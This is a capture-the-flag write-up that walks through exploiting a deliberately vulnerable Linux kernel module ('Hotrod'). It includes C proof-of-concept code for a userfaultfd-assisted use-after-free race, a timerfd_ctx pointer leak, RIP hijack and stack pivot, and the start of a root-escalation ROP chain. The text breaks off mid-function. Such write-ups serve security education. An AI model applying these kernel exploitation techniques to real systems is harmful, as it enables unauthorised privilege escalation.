/ CTF, RESEARCH

[CUCTF 2020] Kernel Exploitation: Hotrod

Hotrod is a kernel exploitation challenge created by my friend FizzBuzz101 for CUCTF 2020. I tested the challenge before release and since the exploitation process was really interesting, I decided to write this article. In the next sections we will see how to get a root shell exploiting a UAF, using a single allocation, a timerfd_ctx structure and userfaultfd. Let’s start!

Information Gathering

Before touching the kernel module, we need to better understand the system itself, gathering as much information as possible. We can start our analysis inspecting run_challnge.sh:

#!/bin/sh

qemu-system-x86_64 \
    -s \
    -m 64M \
    -nographic \
    -kernel "./bzImage" \
    -append "console=ttyS0 quiet loglevel=3 oops=panic panic=-1 pti=on kaslr nosmap min_addr=4096" \
    -no-reboot \
    -cpu qemu64,+smep \
    -monitor /dev/null \
    -initrd "./initramfs.cpio" \
    -smp 2 \
    -smp cores=2 \
    -smp threads=1

We can immediately see that various protections are enabled.

SMEP (Supervisor Mode Execution Prevention):

With SMEP, the CPU will generate a fault if we try to directly execute instructions in user space. This means that even if we are able to control the kernel instruction pointer, we can’t simply map an executable memory region in user space, place our code there and execute it.

Luckily, since SMAP (Supervisor Mode Access Prevention) is disabled, we can still access data in higher CPU rings, so we can build our ROP-chain in user space, perform stack pivoting and start executing gadgets. Another approach is to turn off the 20th flag of the CR4 register to disable SMEP and then directly execute code in user space:

cr4

KASLR (Kernel Address Space Layout Randomization):

With this option, every time the system boots up, the location of kernel code in memory is randomized. This means that if we want to build a ROP-chain, we will probably need to leak pointers to compute the current kernel base address.

KPTI (Kernel Page Table Isolation):

KPTI has been implemented in the Linux kernel after the Meltdown security vulnerability. It helps preventing information leaks separating user space and kernel space page tables. Changing the 12th flag of the CR3 register, the system can switch between two sets of page tables. When the system runs in kernel mode, it uses the first set, so it can access both kernel and user address space (The latter for things like copy_to_user). In addition, the NX flag is set in the top level of the user portion of kernel page tables, in this way any missed kernel to user CR3 switch will cause a crash. Instead, when the system runs in user mode, it uses the second set, now it can access to a copy of user address space, but just a limited portion of kernel address space: the data needed to enter/exit the kernel and the IDT. These data are stored in the cpu_entry_area structure, placed in the fixmap.

cr3

uname -a
Linux (none) 5.8.3 #12 Sun August 26 12:00:00 UTC 2020 x86_64 GNU/Linux

The kernel version is very recent, I couldn’t find any known vulnerability to perform privilege escalation.

We can proceed extracting symbol addresses and ROP gadgets. Since the System.map file is not present and we can’t access /proc/kallsyms as unprivileged user, we need to extract the filesystem and modify the init file to get root privileges.

The filesystem is compressed using the cpio format, we can extract it and replace the user uid/gid using the following commands:

mkdir fs && cd fs && cpio -idv < ../initramfs.cpio # Extract the archive
sed -i 's/setuidgid 1000 sh/setuidgid 0 sh/g' init # Replace the user uid/gid
find . | cpio --create --format='newc'  > ../initramfs.cpio # Rebuild the archive:

The next step is to disable KASLR, since we need default symbol addresses, without randomization:

sed -i 's/kaslr/nokaslr/g' run_challenge.sh

Finally we can get symbols from /proc/kallsyms.

I also created /bin/info, containing:

#!/bin/sh

HOTROD=$(cat /proc/kallsyms | grep hotrod_ioctl | cut -d " " -f1)
echo [*] Module base: 0x$HOTROD

Then I added /bin/sh /bin/info in the init file, so I can get the hotrod_ioctl address every time the system boots up. Very useful for debugging purposes.

Now we can re-enable KASLR, restore the user uid/gid to 1000 and rebuild the cpio archive.

To obtain ROP gadgets, we need to extract the kernel image. We can do it using binwalk to locate the vmlinuz file (the compressed kernel image) inside bzImage:

binwalk bzImage

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
15109         0x3B05          gzip compressed data, maximum compression, from Unix, last modified: 1970-01-01 00:00:00)

Then we can use dd to extract it and gunzip to decompress the archive:

dd if=./bzImage bs=1 skip=15109 of=vmlinux.gz && gunzip vmlinux.gz

Now we can finally extract ROP gadgets using a tool like ropper or ROPGadget:

ropper --file ./vmlinux --nocolor > gadgets

PS: We could also have used the extract-vmlinux script to extract the kernel image.

Reverse Engineering

file hotrod.ko
hotrod.ko: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), BuildID[sha1]=6bcf4da490ac3e3ab5db8148eb08238250716d32, with debug_info, not stripped

As we can see, we have a 64-bit kernel module, with debug information and it is not stripped.

I won’t cover the reverse engineering process (from asm to pseudo C) in detail to avoid unnecessarily lengthening of the article. Here’s my high-level representation of the module after static analysis:

#define ALLOC 0xBAADC0DE
#define FREE  0xC001C0DE
#define SHOW  0x1337C0DE
#define EDIT  0xDEADC0DE

static DEFINE_MUTEX(hotrod_lock);

static unsigned int allocated, freed, showed, edited;
struct miscdevice hotrod_dev;
struct file_operations hotrod_fops;

hotrod_fops.unlocked_ioctl = hotrod_ioctl;

struct
{
    unsigned long size;
    char *content;
} req;


struct
{
    unsigned long size;
    char *content;
} hotrod;


int init_hotrod()
{

  mutex_init(&hotrod_lock);

  hotrod_dev.minor = 255; // MISC_DYNAMIC_MINOR
  hotrod_dev.name = "hotrod";
  hotrod_dev.fops = &hotrod_fops;

  if ( !misc_register(&hotrod_dev) )
  {

    printk(KERN_INFO, "Hotrod Driver Initialized\n");
    printk(KERN_INFO, "Remember, all of the features only work once!\n");

    return 0;
  }

  return -1;
}


int hotrod_ioctl(struct file *file, unsigned int action, unsigned long user_req)
{

    switch (action)
    {


        case ALLOC:
        {

            unsigned long allocation_size = user_req;

            if ( !allocated )
            {
                allocation_size = user_req;
                allocated = 1;

                if( !hotrod.size && !hotrod.content && 0xe0 <= allocation_size  <= 0xf0 )

                    hotrod.content = kmalloc(allocation_size, 0xcc0);

                    if ( hotrod.content )
                    {
                        hotrod.size = allocation_size;
                        return 0;
                    }
            }

            return -1;
       }


       case FREE:
       {
           if ( !freed )
           {
               freed = 1;

               if ( hotrod.size && hotrod.content )
               {
                   kfree(hotrod.content);
                   hotrod.contet = 0;
                   hotrod.size = 0;
                   return 0;
               }
           }

           return -1;
       }


       case SHOW:
       {
            if ( !showed && hotrod.size )
            {
              showed = 1;

              if ( hotrod.content )
              {
                copy_from_user(&req, user_req, 0x10);

                if ( req.size <= hotrod.size )
                {
                    copy_to_user(req.content, hotrod.content, req.size);
                    return 0;
                }
              }
            }

            return -1;
       }


       case EDIT:
       {

         if ( !edited && hotrod.size )
         {
           edited = 1;

           if ( !hotrod.content )
           {
             copy_from_user(&req, user_req, 0x10);

             if ( req.size <= hotrod.size )
             {
                 copy_from_user(hotrod.content, req.content, req.size);
                 return 0;
             }
           }
         }

         return -1;
      }


    }
}


void exit_hotrod()
{
  misc_deregister(&hotrod_dev);
  printk(KERN_INFO, "Hotrod Driver Removed\n");
}

As we can see, the init_hotrod() function is using misc_register(), an interface offered by the misc driver to allow modules to register a misc device with the kernel.

In Linux, every device is identified by a major and a minor number. The major number is used by the kernel to identify the driver associated with the device. The misc driver is identified by the major number 10. The minor number depends on the device and it’s used by the driver to differentiate among various devices.

misc_register() takes as argument a miscdevice structure, in this case hotrod_dev.

We can see that in hotrod_dev, three fields are set:

  • minor: In this case set to 255, corresponds to MISC_DYNAMIC_MINOR and as we can see from kernel.org: If the minor number is set to MISC_DYNAMIC_MINOR a minor number is assigned and placed in the minor field of the structure.

  • name: It leaves no room for imagination…

  • fops: It is a pointer to the file_operations structure. With this structure, we can expose functions that will allow users interact with the device. In this case unlocked_ioctl() is the only exposed function, which we will cover shortly.

After initialization, the device node is created in /dev. Now Hotrod appears like a character device on which is possible to perform I/O operation using a streams of characters:

ls -la /dev | grep hotrod
crw-rw-rw-    1 root     root       10,  63 Oct  19 09:11 hotrod

As we can see, the letter “c” indicates that Hotrod a character device, its major number is 10 and the minor number is 63.

At this point we know that we can interact with the module using ioctl(). The hotrod_ioctl() function, allows us to perform four different actions: Alloc, Free, Show and Edit. It’s important to note that we can perform each action only once!

We have a limited allocation size between 0xe0 and 0xf0 bytes, to understand what it means, let’s briefly introduce the Slab Allocator. The Slab allocator is used by the Linux kernel to group objects of the same size into caches. Each cache consist in one or more slabs and each slab is composed by one or more contiguous page frames. In each slab are stored a certain number of objects.

There are two classes of caches:

  • General purpose caches: They are called kmalloc-N where N is a power of two: kmalloc-64, kmalloc-128, kmalloc-256 and so on.

  • Specialized caches: Used for common objects: task_struct, mm_struct, vm_area_struct and so on.

slab

The Slab allocator uses a LIFO scheme to perform allocations and deallocations. The kernel will keep track of freed objects in a freelist and will serve them when a new allocation of the same size takes place.

(Of course this is just a basic overwiew of the Slab allocator, for a detailed analysis, check the articles in the References section).

So for every allocation in range 0xe0-0xf0 bytes, 224-240 in decimal, the Slab allocator will use kmalloc-256 cache.

Continuing to analyze the code, we can see the presence of checks that prevent us to overflow in the next object and other checks that prevent us to get a trivial UAF, Double Free and so on.

So, where is the bug?

cr3

The Bug

The old ioctl() implementation ran under Big Kernel Lock. From The new way of ioctl():

ioctl() is one of the remaining parts of the kernel which runs under the Big Kernel Lock (BKL).
In the past, the usage of the BKL has made it possible for long-running ioctl()
methods to create long latencies for unrelated processes.

Of course this was really inefficient in SMP environment, because during ioctl operations nothing else could be executed, therefore, two new functions have been introduced: unlocked_ioctl() and compat_ioctl(). In kernel version 2.6.36, the old ioctl implementation has been completely removed, as we can see from kill .ioctl file_operation.

From The new way of ioctl() we can also understand the difference between the old and the new ioctl() implementation:

If a driver or filesystem provides an unlocked_ioctl() method, it will be called in preference to the older ioctl().
The differences are that the inode argument is not provided (it's available as filp->f_dentry->d_inode)
and the BKL is not taken prior to the call.
All new code should be written with its own locking, and should use unlocked_ioctl().

This completely changes the situation for us, opening new exploitation paths, because hotrod is using unlocked_ioctl() but it is not using its own locking!

It means that using two threads, we can exploit a race condition that will cause an Use After Free, leading to arbitrary code execution.

A basic idea can be the following: Let’s assume that we can use Alloc to get an allocation in kmalloc-256 and find a way to get a leak using Show. Then we can use Edit to copy our buffer from user space to the allocated memory region in kernel space. At same time, with another thread, we use Free to deallocate the object, then we allocate a structure of a specific size, so it will be allocated in the same place. In this way the Edit operation will hopefully overwrite function pointers in the structure causing a UAF and we will be able to hijack the kernel instruction pointer.

Of course, to succeed in this plan, we need two elements:

  • A structure allocated in kmalloc-256: it will allow us to get a memory leak and hopefully to control the kernel instruction pointer.
  • A way to make our race condition reliable: we can perform each action only once, so we need to find a way to maximize the success rate of the race condition.

The structure - timerfd_ctx

As we can see from this useful article, an interesting structure allocated in kmalloc-256 cache, is timerfd_ctx.

struct timerfd_ctx
{
  union
  {
    struct hrtimer tmr;
    struct alarm alarm;
  } t;
  ktime_t tintv;
  ktime_t moffs;
  wait_queue_head_t wqh;
  u64 ticks;
  int clockid;
  short unsigned expired;
  short unsigned settime_flags;	/* to show in fdinfo */
  struct rcu_head rcu;
  struct list_head clist;
  spinlock_t cancel_lock;
  bool might_cancel;
};

The structure in the union are respectively a hrtimer structure:

struct hrtimer
{
  struct timerqueue_node node; // timerqueue node, which also manages node.expires
  ktime_t _softexpires; // the absolute earliest expiry time of the hrtimer.
  enum hrtimer_restart (*function)(struct hrtimer *); // timer expiry callback function
  struct hrtimer_clock_base *base; // pointer to the timer base (per cpu and per clock)
  u8 state; // state information (See bit values above)
  u8 is_rel; // Set if the timer was armed relative
  u8 is_soft; // Set if hrtimer will be expired in soft interrupt context.
};

And an alarm structure:

struct alarm
{
  struct timerqueue_node node; // timerqueue node adding to the event list this value also includes the expiration time.
  struct hrtimer timer; // hrtimer used to schedule events while running
  enum alarmtimer_restart (*function)(struct alarm *, ktime_t now); // Function pointer to be executed when the timer fires.
  enum alarmtimer_type type; // Alarm type (BOOTTIME/REALTIME).
  int state; // Flag that represents if the alarm is set to fire or not.
  void *data; // Internal data value.
};

This object is allocated every time we use timerfd_create() to create a timer instance. The timerfd_ctx structure is good a choice for us, because it allow to leak kernel function pointers and kernel heap addresses. Is important to note that the structure is freed using kfree_rcu. kfree_rcu() will deallocate the object using kfree() after a grace period to ensure the object is no longer used by any thread. We can simply avoid this problem using sleep(1) after freeing the object to make sure it has actually been freed, then we can use Alloc and Show to leak pointers.

Another important detail is that when the timer expires, the third field in the hrtime structure, the function pointer (timerfd_tmrproc), is executed. This means that if we cause a UAF and then we overwrite the function pointer, we will be able to control the kernel instruction pointer once the timer expires!

Here’s timerfd_ctx in memory. We are interested in the highlighted fields:

0xffff888000297900:  0xffff888000297900 [1]    0x0000000000000000  
0xffff888000297910:  0x0000000000000000        0x00000002ef81037a [2]             
0xffff888000297920:  0x00000002ef81037a [3]    0xffffffff81102a00 [4]
0xffff888000297930:  0xffffffff8183e080        0x0000000000000000      
0xffff888000297940:  0x0000000000000000        0x0000000000000000      
0xffff888000297950:  0x0000000000000000        0x0000000000000000      
0xffff888000297960:  0x0000000000000000        0x0000000000000000      
0xffff888000297970:  0x0000000000000000        0x0000000000000000      
0xffff888000297980:  0xbdbbd3bf6c2a6d81        0xffff888000297988      
0xffff888000297990:  0xffff888000297988        0x0000000000000000      
0xffff8880002979a0:  0x0000000000000000        0xffff88800013eb00      
0xffff8880002979b0:  0x00000000000000a8        0x0000000000000000      
0xffff8880002979c0:  0x0000000000000000        0x0000000000000000      
0xffff8880002979d0:  0x0000000000000000        0x0000000000000000      
0xffff8880002979e0:  0x0000000000000000        0x0000000000000000

Optimize the race condition - userfaultfd

At this point we have the structure. Now we need to find a way to make the race condition reliable.

To succeed in our goal, we can take advantage of a feature of the Linux kernel: Usefaultfd. This feature, allows user space processes to handle page faults and other memory management tasks. For example it can be useful to measure page fault latency, but it also has a dark side.

We can start monitoring a specific memory range, let’s say a page of memory, waiting for page faults. When the kernel will try to access that page, it will cause a page fault and the control will be transferred to the page faults handler (our process in user space). This will give us the ability to suspend the kernel thread for N seconds and eventually exploit a race condition that will lead to arbitrary code execution!

The plan

Now that we have all the pieces of the puzzle, we can reformulate our plan in the following way:

To get a memory leak, we can allocate a timerfd_ctx structure using timerfd_create(), then we can close the file descriptor associated with the object, so the structure will be freed. Then, using Alloc we can get an allocation in the same place and using Show we can leak the timerfd_tmrproc pointer that will allow us to compute kernel base address.

To control the kernel instruction pointer, let’s see what happens when we use Edit:

[...]
case EDIT:
{

  if ( !edited && hotrod.size )
  {
    edited = 1;

    if ( !hotrod.content )
    {
      copy_from_user(&req, user_req, 0x10); // [1]

      if ( req.size <= hotrod.size )
      {
          copy_from_user(hotrod.content, req.content, req.size); // [2]
          return 0;
      }
    }
  }

  return -1;
}
[...]

the kernel copies the user request from user space to kernel space using copy_from_user() [1]. Then, after a size check, with a second call to copy_from_user(), the kernel copies req.size bytes from req.content to the memory region we have previously allocated using Alloc [2].

This means that we can map a memory region to use as req.content:

void *page = mmap((void *)0xdead000, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);

then we can create a thread that will start monitoring the mapped region using userfaultfd, waiting for a page fault. It will be our Page Faults Handler (PFH). Once the PFH is running, from the main thread, we can use Edit to force the kernel to access req.content causing a page fault [2]. At this point the control will be transferred to the PFH and we will be able to suspend the faulting thread. Now, always with ours PFH, we can

  • Use Free to deallocate the previously allocated object.
  • Create a timer that will allocate another timerfd_ctx structure in the same place (remember that freelists work in a LIFO manner).
  • Release the faulting thread that will overwrite the structure in memory.

Once the timer expires, we will be able to control the kernel instruction pointer!

                       +
                       |
                       |
            +----------v----------+
            |    create_timer()   |    +------+
            +----------+----------+           |
                       |                      |
                       |                      |
            +----------v----------+           |
            |      do_alloc()     |           +---->  Leak
            +----------+----------+           |
                       |                      |
                       |                      |
            +----------v----------+           |
            |      do_show()      |    +------+
            +----------+----------+
                       |
                       |
            +----------v----------+
            |   pthread_create()  +--------------------------+
            +----------+----------+                          |
                       |                                     |
                       |                          +----------v----------+
                       |                          |    userfaultfd()    |
                       |                          +----------+----------+
                       |                                     |
                       |                                     |
                       |                          +--------->+
                       |                          |          |
                       |                          |          |
                       |                          |   ... polling ...
                       |                          |          |
            +----------v----------+               |          |
            |      do_edit()      |               +----------+
            +----------+----------+                          |
                       |                                     |
                       X                                 PAGE FAULT         +------+
                                                             |                     |
                                                             |                     |
                                                  +----------v----------+          |
                                                  |      do_free()      |          |
                                                  +----------+----------+          |
                                                             |                     |
                                                             |                     |
                                                  +----------v----------+          |
                                                  |    create_timer()   |          +--->  Handle PF            
                                                  +----------+----------+          |
                                                             |                     |
                                                             |                     |
                                                  +----------v----------+          |
                                                  |      ioctl_ufd()    |          |
                                                  +----------+----------+          |
                                                             |                     |
                                                             |                     |
                       X                                  RELEASE           +------+
                       |
            +----------v----------+
            | Edit complete (UAF) |
            +---------------------+

The exploit - Controlling RIP

We can start writing the helper functions to interact with the device. Since we have ascertained that allocations in range 0xe0-0xf0 will go in kmalloc-256, we can use an arbitrary allocation size of 0xf0 bytes.

#define DEVICE_PATH "/dev/hotrod"

#define ALLOC 0xBAADC0DE
#define FREE 0xC001C0DE
#define SHOW 0x1337C0DE
#define EDIT 0xDEADC0DE

#define PAGE_SIZE 0x1000

static int fd, ufd;
static unsigned long size = 0xf0;
static unsigned char buff[0xf0];
static unsigned long kernel_base, leak, timerfd_ctx, pivot;
static void *page;

struct request
{
  unsigned long size;
  unsigned char *buff;
};


void hexdump(unsigned char *buff, unsigned long size)
{
    int i,j;

    for (i = 0; i < size/8; i++)
    {
      if ((i % 2) == 0)
      {
        if (i != 0)
            printf("  \n");

        printf("  %04x  ", i*8);
      }

      unsigned long ptr = ((unsigned long *)(buff))[i];
      printf("0x%016lx", ptr);
      printf("    ");

    }
    printf("\n");
}


void do_alloc(unsigned long size)
{
  ioctl(fd, ALLOC, size);
}


void do_free(int fd)
{
  ioctl(fd, FREE);
}


void do_show(unsigned char *dest, unsigned long size)
{
  struct request req;

  req.size = size;
  req.buff = dest;

  ioctl(fd, SHOW, &req);
}


void do_edit(unsigned char *src, unsigned long size)
{
  struct request req;

  req.size = size;
  req.buff = src;

  ioctl(fd, EDIT, &req);
}

To create a timer instance, we can use:

int create_timer(int leak)
{
  struct itimerspec its;

  its.it_interval.tv_sec = 0;
  its.it_interval.tv_nsec = 0;
  its.it_value.tv_sec = 10;
  its.it_value.tv_nsec = 0;

  int tfd = timerfd_create(CLOCK_REALTIME, 0);
  timerfd_settime(tfd, 0, &its, 0);

  if (leak)
  {
    close(tfd);
    sleep(1);
    return 0;
  }
}

Then we can proceed writing the function to initialize userfaultfd:

int userfaultfd(int flags)
{
  return syscall(SYS_userfaultfd, flags);
}


int initialize_ufd()
{
  int fd;

  puts("[*] Mmapping page...");
  page = mmap((void *)0xdead000, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);

  struct uffdio_register reg;

  if ((fd = userfaultfd(O_NONBLOCK)) == -1)
  {
    perror("[ERROR] Userfaultfd failed");
    exit(-1);
  }

  struct uffdio_api api = { .api = UFFD_API };

  if (ioctl(fd, UFFDIO_API, &api))
  {
    perror("[ERROR] ioctl - UFFDIO_API failed");
    exit(-1);
  }

  if (api.api != UFFD_API)
  {
    puts("[ERROR] Unexepcted UFFD api version!");
    exit(-1);
  }

  printf("[*] Start monitoring range: %p - %p\n", page, page + PAGE_SIZE);

  reg.mode = UFFDIO_REGISTER_MODE_MISSING;
  reg.range.start = (long)(page);
  reg.range.len = PAGE_SIZE;

  if (ioctl(fd, UFFDIO_REGISTER,  &reg))
  {
    perror("[ERROR] ioctl - UFFDIO_REGISTER failed");
    exit(-1);
  }

  return fd;
}

And the page fault handler:

void *page_fault_handler(void *_ufd)
{
  struct pollfd pollfd;
  struct uffd_msg fault_msg;
  struct uffdio_copy ufd_copy;

  int ufd = *((int *) _ufd);

  pollfd.fd = ufd;
  pollfd.events = POLLIN;

  while (poll(&pollfd, 1, -1) > 0)
  {

    if ((pollfd.revents & POLLERR) || (pollfd.revents & POLLHUP))
    {
      perror("[ERROR] Polling failed");
      exit(-1);
    }

    if (read(ufd, &fault_msg, sizeof(fault_msg)) != sizeof(fault_msg))
    {
      perror("[ERROR] Read - fault_msg failed");
      exit(-1);
    }

    char *page_fault_location = (char *)fault_msg.arg.pagefault.address;

    if (fault_msg.event != UFFD_EVENT_PAGEFAULT || (page_fault_location != page && page_fault_location != page + PAGE_SIZE))
    {
      perror("[ERROR] Unexpected pagefault?");
      exit(-1);
    }

    if (page_fault_location == (void *)0xdead000)
    {
      printf("[+] Page fault at address %p!\n", page_fault_location);

      puts("[*] Freeing...");
      do_free(fd);

      puts("[*] Creating second timer...");
      create_timer(0);

      ((unsigned long *)(buff))[0x3] = 0x000000000eae0e65;
      ((unsigned long *)(buff))[0x4] = 0x000000000eae0e65;
      ((unsigned long *)(buff))[0x5] = 0x4141414141414141; // [1]

      puts("[*] Structure will be overwritten with: ");
      hexdump(buff, size);

      sleep(1.8);

      ufd_copy.dst = (unsigned long)0xdead000;
      ufd_copy.src = (unsigned long)(&buff);
      ufd_copy.len = PAGE_SIZE;
      ufd_copy.mode = 0;
      ufd_copy.copy = 0;

      if (ioctl(ufd, UFFDIO_COPY, &ufd_copy) < 0)
      {
        perror("ioctl(UFFDIO_COPY)");
        exit(-1);
      }

      exit(0);

    }
  }
}

As we can see from [1], with this first POC we should be able to overwrite the kernel RIP with a bounch of “A”s. Finally we can write our main function:

int main(void)
{
  pthread_t tid;

  fd = open(DEVICE_PATH, O_RDONLY);

  puts("[*] Allocating/Freeing timerfd_ctx structure...");
  create_timer(1);

  puts("[*] Leaking timerfd_tmrproc address...");
  do_alloc(size);
  do_show(buff, size);

  puts("[+] Object dump: ");
  hexdump(buff, size);

  leak = ((unsigned long *)(buff))[0x5];
  timerfd_ctx = ((unsigned long *)(buff))[0];
  kernel_base = leak - 0x81102a00UL + 0x100000000UL;

  printf("[+] Leaked timerfd_ctx structure address: 0x%lx\n", timerfd_ctx);
  printf("[+] Leaked timerfd_tmrproc address: 0x%lx\n", leak);
  printf("[+] Kernel base address: 0x%lx\n", (0xffffffff00000000UL + kernel_base));

  int ufd = initialize_ufd();
  pthread_create(&tid, NULL, page_fault_handler, &ufd);

  puts("[*] Triggering page fault...");
  do_edit(page, size);

  pthread_join(tid, NULL);

}

Here’s the complete POC code: poc.c

We can compile the code using:

gcc -o poc poc.c -static -s -lpthread

then we can copy the exploit in the qemu instance and execute it:

          / $ /home/user/poc
          [*] Allocating/Freeing timerfd_ctx structure...
          [*] Leaking timerfd_tmrproc address...
          [+] Object dump:
            0000  0xffff88800029bf00    0x0000000000000000      
            0010  0x0000000000000000    0x00000002e3f48042      
            0020  0x00000002e3f48042    0xffffffff81102a00      
            0030  0xffffffff8183e080    0x0000000000000000      
            0040  0x0000000000000000    0x0000000000000000      
            0050  0x0000000000000000    0x0000000000000000      
            0060  0x0000000000000000    0x0000000000000000      
            0070  0x0000000000000000    0x0000000000000000      
            0080  0xbd7dd3bf6c2aa381    0xffff88800029bf88      
            0090  0xffff88800029bf88    0x0000000000000000      
            00a0  0x0000000000000000    0xffff88800015ad00      
            00b0  0x00000000000000a8    0x0000000000000000      
            00c0  0x0000000000000000    0x0000000000000000      
            00d0  0x0000000000000000    0x0000000000000000      
            00e0  0x0000000000000000    0x0000000000000000    
          [+] Leaked timerfd_ctx structure address: 0xffff88800029bf00
          [+] Leaked timerfd_tmrproc address: 0xffffffff81102a00
          [+] Kernel base address: 0xfffffffd00000000
          [*] Mmapping page...
          [*] Start monitoring range: 0xdead000 - 0xdeae000
          [*] Triggering page fault...
          [+] Page fault at address 0xdead000!
          [*] Freeing...
          [*] Creating second timer...
          [*] Structure will be overwritten with:
            0000  0xffff88800029b900    0x0000000000000000      
            0010  0x0000000000000000    0x000000000eae0e65      
            0020  0x000000000eae0e65    0x4141414141414141 <- timerfd_tmrproc [1]      
            0030  0xffffffff8183e080    0x0000000000000000      
            0040  0x0000000000000000    0x0000000000000000      
            0050  0x0000000000000000    0x0000000000000000      
            0060  0x0000000000000000    0x0000000000000000      
            0070  0x0000000000000000    0x0000000000000000      
            0080  0xbd7bd3bf6c2aa481    0xffff88800029b988      
            0090  0xffff88800029b988    0x0000000000000000      
            00a0  0x0000000000000000    0xffff88800013f800      
            00b0  0x00000000000000a8    0x0000000000000000      
            00c0  0x0000000000000000    0x0000000000000000      
            00d0  0x0000000000000000    0x0000000000000000      
            00e0  0x0000000000000000    0x0000000000000000    
          general protection fault: 0000 [#1] PTI
          CPU: 0 PID: 66 Comm: exploit Tainted: G           O      5.8.3 #12          
          RIP: 0010:0x4141414141414141 // [2]
          Code: Bad RIP value.
          RSP: 0018:ffffc90000003f18 EFLAGS: 00000006
          [...]

Bingo! As expected, overwriting timerfd_tmrproc in the timerfd_ctx structure [1] we can control the kernel instruction pointer! [2] Now we need to create a ROP-chain, perform stack pivoting and start executing gadgets!

Using gdb we can start debugging the kernel of the qemu instance. We are interested in the CPU context when timerfd_tmrproc is called. Let’s comment the following line in our poc:

((unsigned long *)(buff))[0x5] = 0x4141414141414141;

Now we can attach gdb to the kernel and set a brakpoint to timerfd_tmrproc.

When the timer expires, timerfd_tmrproc is executed. As we can see, the RDI contains 0xffff88800029bc00, the address of the timerfd_ctx structure in memory. The first field of the structure, is the address of the structure itself:

context

In red, we can see the address of the structure itself, in green the timerfd_tmrproc:

context

Since the RDI is pointing to the timerfd_ctx structure, and we can control the first field, we can map a memory region to use as fake stack:

void *fake_stack = mmap((void *)0xcafe000, PAGE_SIZE*5, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_POPULATE|MAP_PRIVATE, 0, 0);

and use 0xcafe000 as first field. Then we can perform stack pivoting, overwriting the timerfd_tmrproc pointer with a gadget like:

0xffffffff81027b86: mov esp, dword ptr [rdi]; lea rax, [rax + rsi*8]; ret;

We can make the following changes in the page_fault_handler() function:

[...]
void *fake_stack = mmap((void *)0xcafe000, PAGE_SIZE*5, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_POPULATE|MAP_PRIVATE, 0, 0);

((unsigned long *)(buff))[0x0] = (unsigned long)(fake_stack + 0x800);
((unsigned long *)(buff))[0x3] = 0x000000000eae0e65;
((unsigned long *)(buff))[0x4] = 0x000000000eae0e65;
((unsigned long *)(buff))[0x5] = (unsigned long)(pivot);

unsigned long *rop = (unsigned long *)(fake_stack + 0x800);

*rop ++= 0x4242424242424242;
[...]

Here’s the code of the second POC after applying the aforementioned changes: poc2.c. Let’s execute the exploit again:

            / $ /home/user/poc
            [*] Allocating/Freeing timerfd_ctx structure...
            [*] Leaking timerfd_tmrproc address...
            [+] Object dump:
              0000  0xffff88800029b600    0x0000000000000000      
              0010  0x0000000000000000    0x00000002f21b349d      
              0020  0x00000002f21b349d    0xffffffff81102a00      
              0030  0xffffffff8183e080    0x0000000000000000      
              0040  0x0000000000000000    0x0000000000000000      
              0050  0x0000000000000000    0x0000000000000000      
              0060  0x0000000000000000    0x0000000000000000      
              0070  0x0000000000000000    0x0000000000000000      
              0080  0xbd74d3bf6c2aab81    0xffff88800029b688      
              0090  0xffff88800029b688    0x0000000000000000      
              00a0  0x0000000000000000    0xffff88800013f000      
              00b0  0x00000000000000a8    0x0000000000000000      
              00c0  0x0000000000000000    0x0000000000000000      
              00d0  0x0000000000000000    0x0000000000000000      
              00e0  0x0000000000000000    0x0000000000000000    
            [+] Leaked timerfd_ctx structure address: 0xffff88800029b600
            [+] Leaked timerfd_tmrproc address: 0xffffffff81102a00
            [+] Kernel base address: 0xffffffff00000000
            [*] Mmapping page...
            [*] Start monitoring range: 0xdead000 - 0xdeae000
            [*] Triggering page fault...
            [+] Page fault at address 0xdead000!
            [*] Freeing...
            [*] Creating second timer...
            [*] Structure will be overwritten with:
              0000  0x000000000cafe800    0x0000000000000000      
              0010  0x0000000000000000    0x000000000eae0e65      
              0020  0x000000000eae0e65    0xffffffff81027b86      
              0030  0xffffffff8183e080    0x0000000000000000      
              0040  0x0000000000000000    0x0000000000000000      
              0050  0x0000000000000000    0x0000000000000000      
              0060  0x0000000000000000    0x0000000000000000      
              0070  0x0000000000000000    0x0000000000000000      
              0080  0xbd70d3bf6c2aaa81    0xffff88800029b288      
              0090  0xffff88800029b288    0x0000000000000000      
              00a0  0x0000000000000000    0xffff88800013fb00      
              00b0  0x00000000000000a8    0x0000000000000000      
              00c0  0x0000000000000000    0x0000000000000000      
              00d0  0x0000000000000000    0x0000000000000000      
              00e0  0x0000000000000000    0x0000000000000000    
            general protection fault: 0000 [#1] PTI
            CPU: 0 PID: 66 Comm: exploit Tainted: G           O      5.8.3 #12
            RIP: 0010:0x4242424242424242 // [1]
            Code: Bad RIP value.
            RSP: 0018:000000000cafe808 EFLAGS: 00000006 // [2]
            [...]

Success! After stack pivoting, we overwritten the RIP with a bounch of “B”s [1], and the RSP now contains 0xcafe808 [2]. It’s time to build our ROP-chain!

The exploit - From “B”s to root shell

As a first attempt, let’s try to read the flag. To do so, we can start our ROP-chain with commit_creds(prepare_kernel_cred(0). In Linux every task has its own cred structure, it speficies the security context of the task. prepare_kernel_cred will allocate a new cred structure with uid, gid etc. set to 0. commit_creds will apply it to the current task. In this way we will be able to get root privileges.

Then we need to change the 12th flag of the CR3 register (remember that KPTI is enabled), use swapgs to swap GS back to the user GS, saved in an MSR and then use iretq to return to user space. We can do it in different ways. For example we can use the symbol swapgs_restore_regs_and_return_to_usermode. Using GDB we can see that swapgs_restore_regs_and_return_to_usermode + 0x35 is a perfect gadget for us:

trampoline

We can find similar instructions when the system returns in user space after a syscall:

trampoline2

The only difference is that the first gadget uses iretq, the second one sysretq:

  • iretq expects the following stack layout when returning in user space:

            +-------------------+
            |        RIP        |
            +-------------------+
            |        CS         |
            +-------------------+
            |       RFLAGS      |           
            +-------------------+
            |        RSP        |
            +-------------------+
            |        SS         |
            +-------------------+

  • sysretq accepts user space RIP from RCX and RFLAGS from R11.

We can save the current processor state using:

static void save_state()
{
  __asm__ __volatile__(
    "movq %0, cs;"
    "movq %1, ss;"
    "pushfq;"
    "popq %2;"
